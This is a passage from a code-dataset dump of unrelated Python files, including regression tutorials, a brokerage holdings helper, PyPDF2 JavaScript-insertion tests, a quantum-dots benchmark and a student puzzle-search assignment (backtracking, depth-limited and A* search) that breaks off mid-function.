'r--')\nraw_input()\n\nprint(\"finished!\")\n","sub_path":"cjs-dnn.py","file_name":"cjs-dnn.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"540859662","text":"# Polynomial Regression\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('Position_Salaries.csv')\nX = dataset.iloc[:, 1:2].values #Here we could have just used column=1\n #but that creates an array/vector of integer numbers\n #whereas ML models always require independent variables \n #to be in the form of matrix\ny = dataset.iloc[:, 2].values\n\n# Splitting the dataset into the Training set and Test set\n\"\"\"\nSince the dataset is very small, it is not divided into training and test set.\nPrediction has to be accurate and therefore all the data points are used for building \nthe model.\nThough from the plot it is evident that polynomial regression will suit best\nStill we'll use Linear and Polynomial regression both to build and fit the model\nand compare the results obtained from both.\n\"\"\"\n#Fitting Linear regression to dataset\nfrom sklearn.linear_model import LinearRegression\nlin_reg = LinearRegression()\nlin_reg.fit(X,y)\n\n#Fitting polynomial regression to dataset\nfrom sklearn.preprocessing import PolynomialFeatures\n\n#it can be seen that as we increase the degree of polynomial features\n#the polynomial regression model fits much better\npoly_reg = PolynomialFeatures(degree = 4)\n#X_poly is used to create a matrix of polynomial features(Xo,X^1,X^2)\nX_poly = poly_reg.fit_transform(X)\nlin_reg_2 = LinearRegression()\nlin_reg_2.fit(X_poly,y)\n\n#Visualizing the linear regression results\nplt.scatter(X,y,color = 'red')\nplt.plot(X, lin_reg.predict(X),color = 'blue')\nplt.title('Salary vs Position Level')\nplt.xlabel('Position Level')\nplt.ylabel('Salary')\n\n#Visualizing the polynomial regression results\nplt.scatter(X,y,color = 'green')\nplt.plot(X, lin_reg_2.predict(X_poly),color = 'blue')\nplt.title('Salary vs Position Level')\nplt.xlabel('Position Level')\nplt.ylabel('Salary') \n\n#for a better model,we can decrease the step size between x\nX_grid = np.arange(min(X),max(X),0.1)\nX_grid = X_grid.reshape(len(X_grid),1)\nplt.scatter(X,y,color = 'green')\nplt.plot(X_grid, lin_reg_2.predict(poly_reg.fit_transform(X_grid)),color = 'blue')\nplt.title('Salary vs Position Level')\nplt.xlabel('Position Level')\nplt.ylabel('Salary')\n\n#Predict salaries using linear regression\nlin_reg.predict(6.5)\n\n#Predict salaries using linear regression\nlin_reg_2.predict(poly_reg.fit_transform(6.5))\n\n\n\n","sub_path":"Part 2 - Regression/Section 6 - Polynomial Regression/polynomial_regression.py","file_name":"polynomial_regression.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"346934947","text":"import pandas as pd\nimport numpy as np\nimport ally\nimport yfinance as yf\nfrom termcolor import colored\nfrom gamestonk_terminal.portfolio.brokers.brokers_helpers import ally_positions_to_df\n\n# pylint: disable=no-member\n\n\ndef login():\n try:\n ally.Ally()\n except Exception as e:\n print(e)\n print(\"\")\n\n\ndef show_holdings():\n\n a = ally.Ally()\n hold = a.holdings()\n stonks = list(hold.sym)\n last_prices = np.asarray(list(hold.lastprice.astype(float))).round(2)\n equity = list(round(hold.marketvalue.astype(float), 2))\n # Loop to get previous close (ally api does not provide that)\n tickers = yf.Tickers(\" \".join(stonks))\n prev_closes = np.array([t.info[\"previousClose\"] for t in tickers.tickers])\n pct_changes = ((last_prices - prev_closes) / prev_closes).round(3)\n\n print(\"Stonk\\t last price \\t prev close \\t equity \\t % Change\")\n\n for stonk, last_price, prev_close, eq, pct_change in zip(\n stonks, last_prices, prev_closes, equity, pct_changes\n ):\n\n to_print = f\"{stonk}\\t {last_price}\\t\\t {prev_close}\\t\\t {eq}\\t\\t {pct_change}\"\n if last_price >= prev_close:\n print(colored(to_print, \"green\"))\n else:\n print(colored(to_print, \"red\"))\n\n print(\"\")\n\n\ndef return_holdings() -> pd.DataFrame:\n a = ally.Ally()\n hold = a.holdings()\n return ally_positions_to_df(hold)\n","sub_path":"gamestonk_terminal/portfolio/brokers/ally_api.py","file_name":"ally_api.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"118167380","text":"import os\n\nimport pytest\n\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\n\n# Configure path environment\nTESTS_ROOT = os.path.abspath(os.path.dirname(__file__))\nPROJECT_ROOT = os.path.dirname(TESTS_ROOT)\nRESOURCE_ROOT = os.path.join(PROJECT_ROOT, \"Resources\")\n\n\n@pytest.fixture()\ndef pdf_file_writer():\n reader = PdfFileReader(os.path.join(RESOURCE_ROOT, \"crazyones.pdf\"))\n writer = PdfFileWriter()\n writer.appendPagesFromReader(reader)\n yield writer\n\n\ndef test_add_js(pdf_file_writer):\n pdf_file_writer.addJS(\"this.print({bUI:true,bSilent:false,bShrinkToFit:true});\")\n\n assert (\n \"/Names\" in pdf_file_writer._root_object\n ), \"addJS should add a name catalog in the root object.\"\n assert (\n \"/JavaScript\" in pdf_file_writer._root_object[\"/Names\"]\n ), \"addJS should add a JavaScript name tree under the name catalog.\"\n assert (\n \"/OpenAction\" in pdf_file_writer._root_object\n ), \"addJS should add an OpenAction to the catalog.\"\n\n\ndef test_overwrite_js(pdf_file_writer):\n def get_javascript_name():\n assert \"/Names\" in pdf_file_writer._root_object\n assert \"/JavaScript\" in pdf_file_writer._root_object[\"/Names\"]\n assert \"/Names\" in pdf_file_writer._root_object[\"/Names\"][\"/JavaScript\"]\n return pdf_file_writer._root_object[\"/Names\"][\"/JavaScript\"][\"/Names\"][0]\n\n pdf_file_writer.addJS(\"this.print({bUI:true,bSilent:false,bShrinkToFit:true});\")\n first_js = get_javascript_name()\n\n pdf_file_writer.addJS(\"this.print({bUI:true,bSilent:false,bShrinkToFit:true});\")\n second_js = get_javascript_name()\n\n assert (\n first_js != second_js\n ), \"addJS should overwrite the previous script in the catalog.\"\n","sub_path":"Tests/test_javascript.py","file_name":"test_javascript.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"356133366","text":"from quantum_systems.quantum_dots.two_dim.two_dim_interface import (\n get_coulomb_element,\n get_indices_nm,\n get_coulomb_elements,\n)\nfrom quantum_systems.quantum_dots.two_dim.coulomb_elements import new_coulomb_ho\nfrom quantum_systems.quantum_dots.two_dim.two_dim_helper import (\n new_get_coulomb_elements,\n)\n\nimport time\nimport numpy as np\n\n\ndef fetch_elements(l, foo):\n t0 = time.time()\n for p in range(l):\n n_p, m_p = get_indices_nm(p)\n for q in range(l):\n n_q, m_q = get_indices_nm(q)\n for r in range(l):\n n_r, m_r = get_indices_nm(r)\n for s in range(l):\n n_s, m_s = get_indices_nm(s)\n\n args = [n_p, m_p, n_q, m_q, n_r, m_r, n_s, m_s]\n foo(*args)\n\n t1 = time.time()\n print(\"Time spent running {0}: {1} sec\".format(foo.__name__, t1 - t0))\n\n\ndef fetch_all_elements(l, foo):\n t0 = time.time()\n oi = foo(l)\n t1 = time.time()\n\n print(\"Time spent running {0}: {1} sec\".format(foo.__name__, t1 - t0))\n\n return oi\n\n\nl = 20\nfor i in range(10):\n fetch_elements(l, get_coulomb_element)\nfor i in range(10):\n fetch_elements(l, new_coulomb_ho)\n\n\noi_c = fetch_all_elements(l // 2, get_coulomb_elements)\noi_n = np.complex128(fetch_all_elements(l // 2, new_get_coulomb_elements))\n\nnp.testing.assert_allclose(oi_c, oi_n)\n","sub_path":"scripts/compare_time.py","file_name":"compare_time.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"537143850","text":"# Store Vowels in a List and Check if the passed string contains any of the vowel stored\nvowels = [\"a\", \"e\", \"i\", \"o\", \"u\"]\n\n\ndef is_it_vowel(string):\n message = \"not vowel\"\n for x in vowels:\n if string == x:\n message = \"vowel\"\n return message\n\n\nprint(is_it_vowel(\"a\"))\nprint(is_it_vowel(\"b\"))\n","sub_path":"neoOkpara/Phase-1/Day4/find_vowel.py","file_name":"find_vowel.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"91017943","text":"n = int(input())\nx = [int(i) for i in input().split()]\ndata = dict()\nfor i in range(0,n):\n if not (x[i] in data):\n data[x[i]]=[1,i]\n else:\n data[x[i]] = [data[x[i]][0]+1, i]\nt = list(data.items());\nt.sort(key=lambda x: (-x[1][0], x[1][1]))\nprint(t[0][0])","sub_path":"vk1.py","file_name":"vk1.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"503290853","text":"from typing import Union\nimport numpy as np\nimport librosa\nimport matplotlib.pyplot as plt\nimport itertools\n\n\ndef plot_confusion_matrix(cm, classes, normalize=False, title='Confusion matrix', cmap=plt.cm.Blues):\n plt.figure(figsize=(10,10))\n plt.imshow(cm, cmap=cmap)\n plt.title(title)\n plt.colorbar()\n \n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=0)\n plt.yticks(tick_marks, classes)\n \n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt), horizontalalignment=\"center\", color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n \n \ndef predict_models(models, x):\n predictions = []\n for k, model in models.items():\n _, pred = model(x)\n predictions.append(pred.argmax(dim=1).detach().numpy()[0])\n return np.bincount(np.array(predictions)).argmax()","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"535831464","text":"\"\"\"\nFIT3080 Assignment 1: Problem Solving as Search\n\nBy:\n- David Lei, student id: 26029391 , tutorial class: Thursday 11am\n- Haoyu Shi, student id: 25741535, tutorial class: Wednesday 2pm\n\"\"\"\n# -------------------------------------------------- Classes ------------------------------------------------------- #\n\nclass A_Comparator:\n \"\"\" Class that allows DLS nodes to be compared based on depth with tie breaker the preference of operations \"\"\"\n def __init__(self, fn, op, id):\n self.id = id\n self.estimate_Fn = fn\n self.operation = op\n\n def __lt__(self, other):\n if self.estimate_Fn < other.estimate_Fn:\n return True\n elif self.estimate_Fn > other.estimate_Fn:\n return False\n elif self.estimate_Fn == other.estimate_Fn:\n if self._get_op_value(self.operation) < self._get_op_value(other.operation):\n return True\n elif self._get_op_value(self.operation) > self._get_op_value(other.operation):\n return False\n else:\n \"\"\" Comparing by id, bigger id means created first, so expand first, so return smaller \"\"\"\n if self.id > other.id:\n return True\n elif self.id < other.id:\n return False\n else:\n return ValueError\n else:\n raise ValueError\n\n def __gt__(self, other):\n if self.estimate_Fn > other.estimate_Fn:\n return True\n elif self.estimate_Fn < other.estimate_Fn:\n return False\n elif self.estimate_Fn == other.estimate_Fn:\n if self._get_op_value(self.operation) > self._get_op_value(other.operation):\n return True\n elif self._get_op_value(self.operation) < self._get_op_value(other.operation):\n return False\n else:\n \"\"\" Comparing by id, bigger id means created first, so expand first, so return smaller \"\"\"\n if self.id > other.id:\n return False\n elif self.id < other.id:\n return True\n else:\n return ValueError\n else:\n raise ValueError\n\n def _get_op_value(self, op):\n \"\"\" the better the operation the lower the score as we pick the lowest fn node for A* \"\"\"\n d = { \"2L\":1, \"2R\":2,\n \"1L\":3, \"1R\":4,\n \"3L\":5, \"3R\":6 }\n return d[op]\n\nclass DLS_Comparator:\n \"\"\" Class that allows DLS nodes to be compared based on depth with tie breaker the preference of operations \"\"\"\n def __init__(self, d, op):\n self.depth = d\n self.operation = op\n \n def __lt__(self, other):\n if self.depth < other.depth:\n return True\n elif self.depth > other.depth:\n return False\n elif self.depth == other.depth:\n if self._get_op_value(self.operation) < self._get_op_value(other.operation):\n return True\n elif self._get_op_value(self.operation) > self._get_op_value(other.operation):\n return False\n else: \n raise ValueError\n else:\n raise ValueError\n \n def __gt__(self, other):\n if self.depth > other.depth:\n return True\n elif self.depth < other.depth:\n return False\n elif self.depth == other.depth:\n if self._get_op_value(self.operation) > self._get_op_value(other.operation):\n return True\n elif self._get_op_value(self.operation) < self._get_op_value(other.operation):\n return False\n else: \n raise ValueError\n else:\n raise ValueError\n \n def _get_op_value(self, op):\n \"\"\" The better the operation the higher the score as we pick the deepest for DLS \"\"\"\n d = { \"2L\":6, \"2R\":5,\n \"1L\":4, \"1R\":3,\n \"3L\":2, \"3R\":1 }\n return d[op]\n \nclass Node:\n \"\"\"\n Node object to be used as the basic data structure for backtracking and graph search\n \"\"\"\n # static variables, accessible to all instances of the class\n identifier = 0\n\n def __init__(self, parent):\n # identifier\n self.id = self.identifier\n Node.identifier += 1\n # children\n self.L1 = None\n self.L2 = None\n self.L3 = None\n self.R1 = None\n self.R2 = None\n self.R3 = None\n # attributes common to all searchers\n self.parent = parent # parent node\n self.total_cost = None # total actual cost\n # attributes for Backtrack\n self.state_list = None\n self.operation_list = None\n # attributes for Graphsearch\n self.operation_applied = None\n self.state = None # state\n # attributes for DLS\n self.depth = None # depth\n # attributes for A/A*\n self.estimate_Fn = None # f*(n), cost estimate of start to goal through this node\n self.heuristic_value = None # h*(n), value from heuristic function\n self.estimate_Gn= None # g*(n), cost estimate from start node to this node\n\n def get_children(self):\n children = [self.L1, self.L2, self.L3, self.R1, self.R2, self.R3]\n return [child for child in children if child is not None]\n\n def is_leaf(self):\n children = [self.L1, self.L2, self.L3, self.R1, self.R2, self.R3]\n return all(child is None for child in children)\n\n def set_heuristic_value(self, x):\n self.heuristic_value = x\n self.estimate_Fn = self.estimate_Gn + self.heuristic_value\n\n def get_id_rep(self):\n return \"N\"+str(self.id)\n\n def remove_child(self, operation):\n if operation == \"1L\":\n self.L1 = None\n elif operation == \"2L\":\n self.L2 = None\n elif operation == \"3L\":\n self.L3 = None\n elif operation == \"1R\":\n self.R1 = None\n elif operation == \"2R\":\n self.R2 = None\n elif operation == \"3R\":\n self.R3 = None\n else:\n raise KeyError\n# ---------------------------------------------- General Functions ------------------------------------------------- #\n\ndef apply_operation(problem_state, operation):\n \"\"\" Applies operation to a configuration of the problem state, return new configuration \"\"\"\n new_configuration = problem_state[:]\n e_index = new_configuration.index(\"E\")\n if operation == \"1L\":\n new_configuration[e_index], new_configuration[e_index - 1] = new_configuration[e_index - 1], new_configuration[e_index]\n elif operation == \"2L\":\n new_configuration[e_index], new_configuration[e_index - 2] = new_configuration[e_index - 2], new_configuration[e_index]\n elif operation == \"3L\":\n new_configuration[e_index], new_configuration[e_index - 3] = new_configuration[e_index - 3], new_configuration[e_index]\n elif operation == \"1R\":\n new_configuration[e_index], new_configuration[e_index + 1] = new_configuration[e_index + 1], new_configuration[e_index]\n elif operation == \"2R\":\n new_configuration[e_index], new_configuration[e_index + 2] = new_configuration[e_index + 2], new_configuration[e_index]\n elif operation == \"3R\":\n new_configuration[e_index], new_configuration[e_index + 3] = new_configuration[e_index + 3], new_configuration[e_index]\n else:\n raise ValueError\n return new_configuration\n\ndef check_goal_state(problem_state):\n \"\"\" Check if the problem_state is the goal state given the constraints that the problem\n - can only have 7 characters which are elements of {'W','B','E'}\n - there is at least one of each character\n \"\"\"\n count_w = problem_state.count(\"W\")\n # check for the condition that there are no B's on the left side and all W's on the left side ignoring the E\n if problem_state[:count_w + 1].count(\"B\") == 0 and problem_state[:count_w + 1].count(\"W\") == count_w: # allow + 1 for E\n return True\n if problem_state[:count_w].count(\"B\") == 0 and problem_state[:count_w].count(\"W\") == count_w:\n return True\n return False\n\ndef get_operations(problem_state):\n \"\"\"\n operation ordering: 2L, 1L, 2R, 1R, 3L, 3R\n score : 1 2 3 4 5 6\n\n each move will have (\"move\", score)\n\n list of possible operations will be sorted by score\n - if we assume picking preferred operations will allow us to find the result faster this will help\n - if not, the overhead in sorting 6 items is not to much\n\n :param problem_state: node representing state of puzzle\n :return: list of possible operations sorted by score\n \"\"\"\n operations = []\n e_index = problem_state.index(\"E\")\n if e_index - 1 >= 0: # check can move left 1 space\n move = (\"1L\", 2)\n operations.append(move)\n if e_index - 2 >= 0: # check can move left 2 space, jump 1 tile\n move = (\"2L\", 1)\n operations.append(move)\n if e_index - 3 >= 0: # check can move left 3 spaces, jump 2 tiles\n move = (\"3L\", 5)\n operations.append(move)\n n = len(problem_state) - 1\n if e_index + 1 <= n: # check can move right 1 space\n move = (\"1R\", 4)\n operations.append(move)\n if e_index + 2 <= n: # check can move right 2 spaces, jump 1 tile\n move = (\"2R\", 3)\n operations.append(move) # check can move right 3 spaces, jump 2 tiles\n if e_index + 3 <= n:\n move = (\"3R\", 6)\n operations.append(move)\n operations.sort(key = lambda t:t[1]) # sort by index 1 of each tuple\n return [op[0] for op in operations]\n\ndef get_operation_cost(op):\n \"\"\" Maps operation to a cost \"\"\"\n operation_costs = {\n \"1L\": 1, \"1R\": 1,\n \"2L\": 1, \"2R\": 1,\n \"3L\": 2, \"3R\": 2\n }\n cost = operation_costs[op]\n return cost\n\ndef find_solution(goal_node, procedure_name):\n \"\"\" Given a node with the goal state, find the path to the solution via\n iterating through parent nodes \"\"\"\n path = [] # will contain the solution from goal to root\n current_node = goal_node\n while current_node.parent is not None:\n if procedure_name == \"BK\":\n state = current_node.state_list[-1]\n else:\n state = current_node.state\n information = (current_node.operation_applied, state, current_node.total_cost)\n path.append(information)\n current_node = current_node.parent\n # for start state\n if procedure_name == \"BK\":\n state = current_node.state_list[-1]\n else:\n state = current_node.state\n information = (\"start\", state, current_node.total_cost)\n path.append(information)\n return path[::-1]\n\n# ---------------------------------------------- Backtrack Functions ----------------------------------------------- #\n\ndef backtrack(node, flag):\n \"\"\" Backtrack implementation to solve the puzzle\n :param node: start node with the problem_state\n :param flag: flag to be used in diagnostic mode\n :return: node with state of the goal\n \"\"\"\n current_state = node.state_list[-1] # last item in state list is newest state\n for state in node.state_list[:-1]: # check if this state has been seen before\n if current_state == state:\n if flag >= 1:\n flag -= 1\n print(\"Backtrack due to ANCESTOR\")\n write_diagnostic_info(\"Backtrack due to ANCESTOR\")\n return False\n # Chris: check for deadend state?\n if check_goal_state(current_state): # check goal state\n return node\n if len(node.state_list) > 10: # check bound\n if flag >= 1:\n flag -= 1\n print(\"Backtrack due to BOUND REACHED\")\n write_diagnostic_info(\"Backtrack due to BOUND REACHED\")\n return False\n\n operations = get_operations(current_state)[::-1] # get possible operations\n\n while len(operations) > 0: # while there are operations that can be done\n best_operation = operations.pop() # last item in operations is best operation\n new_state = apply_operation(current_state, best_operation) # apply best operation to obtain new state\n # extend state and operation lists\n extended_state_list = node.state_list[:]\n extended_state_list.append(new_state)\n extended_op_list = node.operation_list[:]\n extended_op_list.append(best_operation)\n\n next_node = Node(node) # create node for new state\n next_node.state_list = extended_state_list # update entries for the new node\n next_node.operation_list = extended_op_list\n next_node.operation_applied = best_operation\n next_node.total_cost = node.total_cost + get_operation_cost(best_operation)\n\n # for diagnostic node, each time operator is applied print:\n # the operator, identifier of generated node, available operators, list of moves executed so far\n if flag >= 1:\n flag -= 1\n print(\"Current op: \" + str(best_operation) + \", id: \" + str(next_node.get_id_rep()) +\n \", Available op(s): \" + str(operations) + \", Ops so far\" + str(next_node.operation_list))\n write_diagnostic_info(\"Current op: \" + str(best_operation) + \", id: \" + str(next_node.get_id_rep()) +\n \", Available op(s): \" + str(operations) + \", Ops so far\" + str(next_node.operation_list))\n result = backtrack(next_node, flag) # backtrack\n if result:\n return result # return node with goal state\n else:\n pass # loop\n if flag >= 1:\n flag -= 1\n print(\"Backtrack due to NO MORE OPS\")\n write_diagnostic_info(\"Backtrack due to NO MORE OPS\")\n return False\n\n# -------------------------------------------- Graphsearch Functions ----------------------------------------------- #\n\ndef print_structure(root):\n children = root.get_children()\n print(print_info([root]))\n print_structure_aux(children)\n\ndef print_structure_aux(children):\n if children:\n print_info(children)\n for child in children:\n kids = child.get_children()\n print_structure_aux(kids)\n\ndef print_info(node_list):\n node = node_list[-1]\n if node.parent is not None:\n p = node.parent.get_id_rep()\n else:\n p = \"root\"\n print(\"Parent: \" + str(p), end = \" \")\n\n for node in node_list:\n print(\"id: \" + str(node.get_id_rep()) + \", state: \" + str(node.state), end=\" $ \")\n print(\"\",end=\"\\n\")\n\ndef add_to_dict(node, procedure_name, dictionary):\n \"\"\" Adds an entry to either closed or open\n entries stored as\n key = (node object, node_value)\n where\n - key is the state of the problem\n - node object is a node\n - node_value is an attribute of node that determines the order of expansion\n \"\"\"\n key = str(node.state)\n if procedure_name == \"DLS\":\n dls_comparator = DLS_Comparator(node.depth, node.operation_applied)\n dictionary[key] = node, dls_comparator\n elif procedure_name == \"A\":\n a_comparator = A_Comparator(node.estimate_Fn, node.operation_applied, node.id)\n dictionary[key] = node, a_comparator\n else:\n raise KeyError\n\ndef get_node_to_expand(open, procedure_name):\n \"\"\" Gets best node to expand based on the node_value and procedure name\n elements are stored in open as\n e = (key, (node, node_value))\n e[0] = key\n e[1][0] = node\n e[1][1] = comparator\n\n where\n - key = node.state\n - node is the node\n - node_value is either\n - id for DLS, pick deepest/one created first\n - estimate_Fn for A/A*, pick smallest\n open_sorted is sorted by node_value in ascending order (smallest to largest)\n so if the procedure_name is \"A\", reverse it and pop the last element\n \"\"\"\n open_sorted = sorted(open.items(), key=lambda t:t[1][1]) # sort open\n if procedure_name == \"DLS\": # biggest comparator is best to expand\n node = open_sorted.pop()[1][0]\n elif procedure_name == \"A\":\n node = open_sorted[::-1].pop()[1][0] # smallest fn is first, best operation has smallest value\n else: # associated so if 2 nodes have same fn, the better operation will tie break\n raise KeyError\n\n del open[str(node.state)] # delete entry from open\n return node\n\ndef check_not_ancestor(new_state, parent):\n \"\"\" Given a state, check if it has been seen in an ancestor node \"\"\"\n current_node = parent\n while current_node is not None: # check state of all ancestors\n if new_state == current_node.state:\n return False\n current_node = current_node.parent\n return True\n\ndef generate_children(parent, operations, open, closed, procedure_name, flag):\n \"\"\" Creates a child node for each valid operation\n returns children in order of [worst, .. , best] as we create the child with the best operation last so\n it has a bigger id and is expanded earlier\n children are guaranteed\n - to not be an ancestor (prevent cycles)\n - to be new (not seen before), uses pointer redirection if it has been seen\n \"\"\"\n children = []\n for operation in operations:\n new_state = apply_operation(parent.state[:], operation) # apply operation to current state of the node\n if procedure_name == \"DLS\":\n new_cost = parent.total_cost + get_operation_cost(operation)\n else:\n new_cost = parent.total_cost + heuristic_function(new_state)\n\n if check_not_ancestor(new_state, parent): # check if ancestor\n # check if has been seen before, does pointer redirection if needed\n in_open_closed = check_node_open_closed(new_state, new_cost, operation, parent, open, closed, procedure_name, flag)\n\n if in_open_closed:\n pass\n else:\n child = Node(parent) # child points to parent\n if procedure_name == \"DLS\":\n child.depth = parent.depth + 1 # update child depth\n child.total_cost = new_cost # update child total cost\n else:\n child.estimate_Gn = parent.total_cost # update child g(n)\n child.set_heuristic_value(heuristic_function(new_state)) # update child h(n) and f(n)\n child.total_cost = parent.total_cost + get_operation_cost(operation)\n child.state = new_state\n child.operation_applied = operation\n children.append(child) # add unseen child to children\n\n if flag >= 1:\n if procedure_name == \"DLS\":\n print(\"Node Generated\\noperator: \" + str(child.operation_applied) + \", id: \" + str(child.get_id_rep())\n + \", parent (id, state): (\" + str(parent.get_id_rep() + \",\" + str(parent.state)) +\")\"\n + \", cost of reaching node - g(n) = \" + str(child.total_cost))\n\n write_diagnostic_info(\"Node Generated\\noperator: \" + str(child.operation_applied) + \", id: \" + str(child.get_id_rep())\n + \", parent (id, state): (\" + str(parent.get_id_rep() + \",\" + str(parent.state)) +\")\"\n + \", cost of reaching node - g(n) = \" + str(child.total_cost))\n else:\n print(\"Node Generated\\noperator: \" + str(child.operation_applied) + \", id: \" + str(child.get_id_rep())\n + \", parent (id, state): (\" + str(parent.get_id_rep() + \",\" + str(parent.state)) +\")\"\n + \", g(n) = \" + str(child.estimate_Gn) + \", h(n) = \" + str(child.heuristic_value) + \", f(n) = \" + str(child.estimate_Fn))\n\n write_diagnostic_info(\"Node Generated\\noperator: \" + str(child.operation_applied) + \", id: \" + str(child.get_id_rep())\n + \", parent (id, state): (\" + str(parent.get_id_rep() + \",\" + str(parent.state)) +\")\"\n + \", g(n) = \" + str(child.estimate_Gn) + \", h(n) = \" + str(child.heuristic_value) + \", f(n) = \" + str(child.estimate_Fn))\n return children\n\ndef point_parent_to_child(parent, child):\n \"\"\" Points the parent node's corresponding pointer to the child node \"\"\"\n if child.operation_applied == \"1L\":\n parent.L1 = child\n elif child.operation_applied == \"2L\":\n parent.L2 = child\n elif child.operation_applied == \"3L\":\n parent.L3 = child\n elif child.operation_applied == \"1R\":\n parent.R1 = child\n elif child.operation_applied == \"2R\":\n parent.R2 = child\n elif child.operation_applied == \"3R\":\n parent.R3 = child\n else:\n raise ValueError\n\ndef check_node_open_closed(new_state, new_cost, new_operation, parent, open, closed, procedure_name, flag):\n \"\"\" Check if a node has been seen before either in open or in closed\n Node is guaranteed to\n - appear at max once in either open or closed\n - if it is seen before, it will not be because of an ancestor on the same path\n :return: True if seen before, else False\n \"\"\"\n for key in open.keys(): # keys are states\n if str(new_state) == key: # seen this state before\n other = open[key] # other is the other node that has the same state\n other_node = other[0]\n if procedure_name == \"DLS\":\n other_cost = other_node.total_cost\n else:\n other_cost = other_node.estimate_Fn\n if other_cost >= new_cost:\n # the new node's state is cheaper to get to so new node will be better\n # make the other node point to new node's parent and update cost details\n # move the children of the other node to new node\n # update children and put children that are leaves back in open so they can be expanded\n # note: this is conceptual, the new node is never created, just the other node's pointers change\n # along with costs to the values of the would be node\n #if procedure_name == \"A\":\n # if other_cost == new_cost:\n # print(\"EQUAL - O\")\n # else:\n # print(\"OTHER IS GREATER THAN FOUND A BETTER WAY - O\")\n pointer_redirection(other[0], new_cost, new_operation, parent, open, closed, procedure_name, flag)\n else:\n # other is cheaper\n # don't make a node as this graphsearch, can't have duplicate nodes\n # no point exploring this path because it is more expensive and we can't include a new node\n pass\n return True\n\n for key in closed.keys():\n if str(new_state) == key: # seen this state before\n other = closed[key] # other is the other node that has the same state\n other_node = other[0]\n if procedure_name == \"DLS\":\n other_cost = other_node.total_cost\n else:\n other_cost = other_node.estimate_Fn\n if other_cost >= new_cost:\n #if procedure_name == \"A\":\n # if other_cost == new_cost:\n # print(\"EQUAL - O\")\n # else:\n # print(\"OTHER IS GREATER THAN FOUND A BETTER WAY - O\")\n pointer_redirection(other[0], new_cost, new_operation, parent, open, closed, procedure_name, flag)\n else:\n pass\n return True\n return False\n\ndef pointer_redirection(old_node, new_cost, new_operation, parent, open, closed, procedure_name, flag):\n \"\"\" Updates parent and the follow for the old node (seen state)\n - total_cost and depth in DLS\n - f(n) estimate in A and total)cost\n For each of the old node's children, update their values (as above)\n Add each of the leaves of the subtree to open so they can be expanded again\n \"\"\"\n if flag >= 1:\n print(\"Node \" + (old_node.get_id_rep()) + \"'s state has been repeated - redirecting as needed\")\n write_diagnostic_info(\"Node \" + (old_node.get_id_rep()) + \"'s state has been repeated - redirecting as needed\")\n old_operation = old_node.operation_applied\n old_parent = old_node.parent\n # if old_parent.get_id_rep() == \"N58\":\n # print(\"Here\")\n if old_parent: # if not None\n old_parent.remove_child(old_operation)\n\n old_node.parent = parent # update parent\n old_node.operation_applied = new_operation # update operation to get to old node\n point_parent_to_child(old_node.parent, old_node) # make parent point to child\n\n if procedure_name == \"DLS\":\n old_node.total_cost = new_cost # update total cost\n old_node.depth = parent.depth + 1 # update depth\n else:\n old_node.estimate_Gn = parent.total_cost # update g(n)\n old_node.set_heuristic_value(heuristic_function(old_node.state)) # update f(n) and h(n)\n\n old_node.total_cost = parent.total_cost + get_operation_cost(new_operation)\n\n deepest = [] # holds leaves\n children = old_node.get_children()\n for child in children:\n if child.is_leaf():\n deepest.append(child)\n if procedure_name == \"DLS\": # update child's details\n child.depth = child.parent.depth + 1 # update depth\n child.total_cost = child.parent.total_cost + get_operation_cost(child.operation_applied) # update total cost\n else:\n child.estimate_Gn = child.parent.total_cost + get_operation_cost(child.operation_applied) # update g(n)\n child.set_heuristic_value(heuristic_function(child.state)) # update f(n) and h(n)\n child.total_cost = child.parent.total_cost + get_operation_cost(new_operation) # update actual cost\n successors = child.get_children() # get child's children\n for s in successors:\n children.append(s)\n for leaf in deepest:\n if leaf in open:\n pass\n elif leaf in closed: # add leaf to open to be expanded\n del closed[leaf.state] # remove leaf from closed\n add_to_dict(leaf, procedure_name, open)\n\ndef dictionary_to_list(dict):\n \"\"\" Formats the contents of dict to be of the form\n (identifier, state) for each node \"\"\"\n return [(n[1][0].get_id_rep(), n[1][0].state) for n in dict.items()]\ndef heuristic_function(problem_state):\n \"\"\" Heuristic function based on the minimum possible cost to get to the goal state degrading the rules of\n the only moving the empty tile, thus will be <= actual cost\n - As h(n) <= h*(n), heuristic cost <= actual cost to get from problem_state to goal state, h is admissible\n - For all children of the node containing this state,\n\n \"\"\"\n count_w = problem_state.count(\"W\")\n buffer = 0\n if \"E\" in problem_state[:count_w]:\n buffer += 1\n copy = problem_state[:]\n cost = 0\n w_encountered = 0\n for i in range(len(copy)):\n if copy[i] == \"W\":\n w_encountered += 1\n if w_encountered == count_w:\n break\n elif copy[i] == \"B\":\n index_first_b = i\n index_first_w = \"\".join(copy).find(\"W\", i, len(copy))\n\n if index_first_w < 0:\n break\n difference = abs(index_first_w - index_first_b)\n if difference <= 2:\n cost += 1\n elif difference <= 4:\n cost += 2\n elif difference == 5:\n cost += 4\n elif difference == 